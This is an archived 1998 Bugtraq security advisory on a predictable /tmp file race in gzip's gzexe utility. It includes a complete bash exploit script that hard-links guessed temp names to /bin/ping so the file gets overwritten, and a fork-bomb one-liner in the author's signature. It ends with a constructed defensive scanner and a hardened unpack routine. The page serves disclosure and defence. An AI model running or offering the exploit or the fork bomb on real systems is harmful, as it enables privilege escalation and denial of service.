The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
GZEXE - the big problem


X-RDate: Thu, 29 Jan 1998 11:32:17 +0500 (ESK)
Date: Wed, 28 Jan 1998 21:41:53 +0100
From: Michał Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: GZEXE - the big problem

** DESCRIPTION **

GZEXE, part of the gzip package, is a small utility which allows
'transparent' compression of any kind of executable (just like pklite
under ms-dos). Unfortunately, it may be extremely dangerous. Here's
the shell script used for decompression:

if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
[...]                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
/tmp/gztmp$$ ${1+"$@"}; res=$?
^^^^^^^^^^^^

Just look at this... An example of a badly-written one ;) It's possible
to overwrite any file (including SUIDs!) with the code of a gzexed executable
when root executes it... Then, this unwanted suid may be easily exploited.
It's also possible to enforce execution of OUR OWN code instead of the
gzexed program, just by choosing as a victim any file not owned by the
user running vulnerable executables, but writable by him/her. This
file (even setuid) may be freely modified by the attacker... Whoops!

** EXPLOIT **

-- GZEXE EXPLOIT --
#!/bin/bash
# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------

VICTIM=/bin/ping
GZEXED=a.out

# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "

if [ ! -f $VICTIM ]; then
  echo "I can't find my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null
cd /tmp
touch $GZEXED

while :; do

  START=`ps|awk '$6=="ps"{print $1}'`

  let START=START+100
  let DO=START+100

  while [ "$START" -lt "$DO" ]; do
    ln $VICTIM gztmp$START &>/dev/null
    let START=START+1
  done

  sleep 10
  rm -f gztmp* &>/dev/null

  NOWY=`ls -l $VICTIM|awk '{print \$5}'`

  if [ ! "$ORIG" = "$NOWY" ]; then
    echo "Done, my master."
    exit 0
  fi

done
-- EOF --

It may be left in the background, just like my gcc-exploit-2. Please
verify the vulnerable executable filename (GZEXED - you may specify more
than one file, separated by spaces).

** FIX **

DO NOT USE GZEXE TO COMPRESS EXECUTABLES.
That's all, TMPDIR will NOT help in this case.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
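The race described in the post, seen from the defender's side, as an added example that is not part of Zalewski's message or of the gzip project's code: a scanner that lists executables carrying the gzexe stub (it greps for the same /tmp/gztmp$$ marker the post's find command uses) and a hardened unpack-and-run routine. As the author says, pointing TMPDIR somewhere else does not by itself close the hole; what does is a directory created fresh, with mode 0700, that only the caller can write to, which is what mktemp -d provides, so no pre-placed hard link or symlink can capture the decompressed output. The function names, the layout of the sample self-extracting file and its payload are constructed for this illustration.

```sh
#!/bin/sh
# Added example (not from the original post): gzexe stub scanner and a
# hardened replacement for the /tmp/gztmp$$ decompression step.
# Function names, the sample file layout and the payload are constructed.

# Vulnerable stub quoted in the advisory, reproduced here only as a comment:
#   if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then ...
#   /tmp/gztmp$$ ${1+"$@"}; res=$?
# The output name depends only on the PID and lives in a world-writable
# directory, so a link planted under that name redirects the write, and
# whatever then sits at that path is executed.

# List every regular file under directory $1 that contains the stub marker.
find_gzexe_binaries() {
    find "$1" -type f -exec grep -l '/tmp/gztmp\$\$' {} \; 2>/dev/null
}

# Hardened unpack: decompress into a fresh private directory, confirm the
# result is a plain file (not a link), execute it, then remove the directory.
# Usage: safe_run_gzexe FILE [ARGS...]
safe_run_gzexe() {
    file=$1; shift
    # gzexe stubs carry "skip=N": the line at which the gzip data begins
    skip=$(sed -n 's/^skip=\([0-9][0-9]*\)$/\1/p' "$file" | head -n 1)
    [ -n "$skip" ] || { echo "not a gzexe file: $file" >&2; return 2; }
    # mktemp -d creates the directory atomically with mode 0700; nobody else
    # can plant a link inside it, so the unpacked name need not be secret
    tmpdir=$(mktemp -d "${TMPDIR:-/tmp}/gzexe.XXXXXX") || return 2
    if ! tail -n +"$skip" "$file" | gzip -cd > "$tmpdir/prog"; then
        rm -rf "$tmpdir"; return 2
    fi
    # belt and braces: refuse to run anything that is not a regular file
    if [ ! -f "$tmpdir/prog" ] || [ -L "$tmpdir/prog" ]; then
        rm -rf "$tmpdir"; return 2
    fi
    chmod 700 "$tmpdir/prog"
    "$tmpdir/prog" "$@" && res=0 || res=$?
    rm -rf "$tmpdir"
    return $res
}

# Build a constructed gzexe-style file at $1: a three-line stub (shebang,
# skip=4, a line carrying the marker) followed by a gzip-compressed payload.
make_sample_gzexe() {
    printf '%s\n' '#!/bin/sh' 'skip=4' \
        '# if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then' > "$1"
    printf '%s\n' '#!/bin/sh' 'echo "payload ran with: $*"' | gzip -c >> "$1"
}

# Stand-alone demonstration: sh this_script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    work=$(mktemp -d)
    make_sample_gzexe "$work/packed"
    echo "gzexe-style files under $work:"
    find_gzexe_binaries "$work"
    safe_run_gzexe "$work/packed" one two
    rm -rf "$work"
fi
```

The scanner relies on grep -l, which prints only the file name even when the match is found in a file that is otherwise binary, so it works on real gzexe output where the stub is followed by compressed data. The unpack routine keeps the stub's own skip= convention, so it can be dropped in front of an existing gzexe-compressed file without repacking it.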

Created 1996-2003 by Maxim Chirkov  